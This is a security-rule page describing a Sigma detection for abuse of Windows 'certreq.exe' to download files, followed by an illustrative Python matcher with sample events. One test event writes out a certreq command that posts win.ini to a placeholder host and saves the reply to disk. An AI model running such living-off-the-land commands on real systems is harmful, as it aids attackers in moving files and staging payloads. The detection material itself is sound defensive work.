Suspicious Certreq Command to Download

Sigma Rules

Summary
This detection rule identifies potentially malicious use of the 'certreq' command on Windows systems, in particular cases where this legitimate certificate-request tool is abused to support command and control (C2) activity by downloading files from the internet. The rule is based on examples provided by the LOLBAS (Living Off the Land Binaries and Scripts) project, which documents how common built-in Windows utilities can be misused by attackers. The detection focuses on process creation events that carry specific indicators: execution of 'certreq.exe' together with command-line arguments that suggest network activity to fetch an external resource. Alerting is triggered by the presence of certain strings in the command line that are indicative of these potentially harmful operations. The rule classifies any such detection as high-risk, given the potential impact of downloading files through a trusted command. It helps security teams respond quickly to potential threats by investigating the source and intent of the command execution.
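The following Python script is an added example that mirrors the selection logic the summary describes (image name plus command-line indicators over process creation events); it is not the Sigma rule itself and not code from the rule's authors. The page does not list the rule's actual indicator strings, so the tokens in CMDLINE_ALL and the suffix check on the image are assumptions modelled on the public LOLBAS certreq entry, and the process events are constructed samples, including a benign certificate-enrollment invocation to show what should not fire.

```python
"""Illustrative detector for 'Suspicious Certreq Command to Download' logic.

Added example, not the Sigma rule. The indicator strings below are
ASSUMPTIONS based on the public LOLBAS certreq entry; the page itself does
not list the rule's selection values. Matching is case-insensitive, as
Sigma string matching is by default.
"""
from dataclasses import dataclass

# ASSUMED indicators (not taken from the page).
IMAGE_SUFFIX = "\\certreq.exe"
# Every token must appear in the command line (Sigma 'contains|all').
CMDLINE_ALL = ("-post", "-config", "http")

RULE_TITLE = "Suspicious Certreq Command to Download"
RULE_LEVEL = "high"  # severity stated on the page


@dataclass
class ProcessEvent:
    """Minimal process-creation record (e.g. Sysmon Event ID 1 fields)."""
    image: str
    command_line: str
    parent_image: str = ""


def matches_certreq_download(event: ProcessEvent) -> bool:
    """Return True when the event satisfies the detection's selection."""
    if not event.image.lower().endswith(IMAGE_SUFFIX):
        return False
    cmd = event.command_line.lower()
    return all(token in cmd for token in CMDLINE_ALL)


def scan(events):
    """Return one alert dict per matching event, tagged with rule and level."""
    return [
        {
            "rule": RULE_TITLE,
            "level": RULE_LEVEL,
            "image": e.image,
            "command_line": e.command_line,
            "parent_image": e.parent_image,
        }
        for e in events
        if matches_certreq_download(e)
    ]


# Constructed sample events for a local test; none are real telemetry.
SAMPLE_EVENTS = [
    # Benign: normal certificate enrollment request, no network fetch.
    ProcessEvent(
        image=r"C:\Windows\System32\certreq.exe",
        command_line=r"certreq.exe -new C:\temp\request.inf C:\temp\request.req",
        parent_image=r"C:\Windows\System32\mmc.exe",
    ),
    # Suspicious: certreq used to post to a URL and write the response to disk.
    ProcessEvent(
        image=r"C:\Windows\System32\certreq.exe",
        command_line=r"certreq -Post -config https://files.example.invalid/ "
                     r"C:\Windows\win.ini C:\Users\Public\out.txt",
        parent_image=r"C:\Windows\System32\cmd.exe",
    ),
    # Wrong image: same tokens, but not certreq.exe, so no match.
    ProcessEvent(
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r"cmd.exe /c echo -Post -config http",
    ),
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

When triaging a hit, the parent image and the output path in the command line are the first things to check: certreq launched from a shell or an Office process, writing to a user-writable directory, is far more suspicious than an enrollment request driven by an MMC console.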
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
Created: 2021-11-24